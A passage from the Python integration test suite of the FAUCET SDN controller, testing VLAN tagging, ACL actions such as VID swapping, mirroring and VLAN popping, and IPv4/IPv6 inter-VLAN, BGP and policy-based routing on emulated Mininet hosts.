""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
VIDS = _vids()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
(' %u:',
' description: "tagged"')) % i for i in VIDS])
CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
'%(port_2)d', ','.join(STR_VIDS),
'%(port_3)d', ','.join(STR_VIDS),
'%(port_4)d', ','.join(STR_VIDS))
def test_tagged(self):
self.ping_all_when_learned()
for host in self.hosts_name_ordered():
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
setup_commands.extend([
'ip link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid),
'ip link set dev %s up' % vlan_int])
self.quiet_commands(host, setup_commands)
for host in self.hosts_name_ordered():
rdisc6_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
rdisc6_commands.append(
'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
self.quiet_commands(host, rdisc6_commands)
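# Every host now has a tagged subinterface and has sent router solicitations on
# each VLAN; verify FAUCET learned the hosts on every VLAN.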
for vlan in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vlan)
for _ in range(3):
for host in self.hosts_name_ordered():
self.quiet_commands(
host,
['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
vlan_hosts_learned = self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': str(vlan)})
if vlan_hosts_learned == len(self.hosts_name_ordered()):
break
time.sleep(1)
self.assertGreater(
vlan_hosts_learned, 1,
msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
def test_tagged(self):
super().test_tagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
self.verify_broadcast((ext_port1, ext_port2), False)
self.verify_broadcast((int_port1, int_port2), True)
self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""
def test_tagged(self):
self.ping_all_when_learned()
native_ips = [
ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
for native_ip in native_ips:
if native_ip != own_native_ip:
self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
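"""Test an ACL output action that rewrites eth_dst and pops the VLAN tag before output."""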
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""
def test_tagged(self):
self._enable_event_log()
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
for _coldstart in range(2):
for _swaps in range(3):
self.verify_ipv4_routing(
first_host, first_host_routed_ip,
second_host, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
# A change of VLAN/ports not involved in routing should be a warm start.
for vid in (300, 200):
self.change_port_config(
self.port_map['port_4'], 'native_vlan', vid,
restart=True, cold_start=False)
self.wait_until_matching_lines_from_file(
r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
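"""Test that FAUCET proactively resolves IPv4 nexthops when proactive_learn_v4 is enabled."""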
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
# We use a narrower mask to force second_host to use the /128 route,
# since otherwise it would realize :99 is directly connected via ND and send directly.
self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""
exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
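"""Test IPv4 routing between two VLANs, including cold restarts when the second VLAN's VID changes."""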
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
for vlanb_vid in (300, 200):
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.change_vlan_config(
'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_connectivity(host_a, host_b):
host_a.setIP(str(first_host_ip.ip), prefixLen=24)
host_b.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(host_a, second_host_ip.ip)
self.one_ipv4_ping(host_b, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
test_connectivity(first_host, second_host)
# Delete port 1, add port 3
self.change_port_config(
self.port_map['port_1'], None, None,
restart=False, cold_start=False)
self.add_port_config(
self.port_map['port_3'], {'native_vlan': 'vlana'},
restart=True, cold_start=True)
test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
self.wait_until_matching_lines_from_faucet_log_files(expired_re)
second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.add_host_ipv6_address(second_host, second_host_net)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
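"""Test policy-based routing: an ACL swaps the VLAN VID so 10.99.0.2/32 is routed
via VLAN 300 while the rest of 10.99.0.0/24 is routed via VLAN 200."""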
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
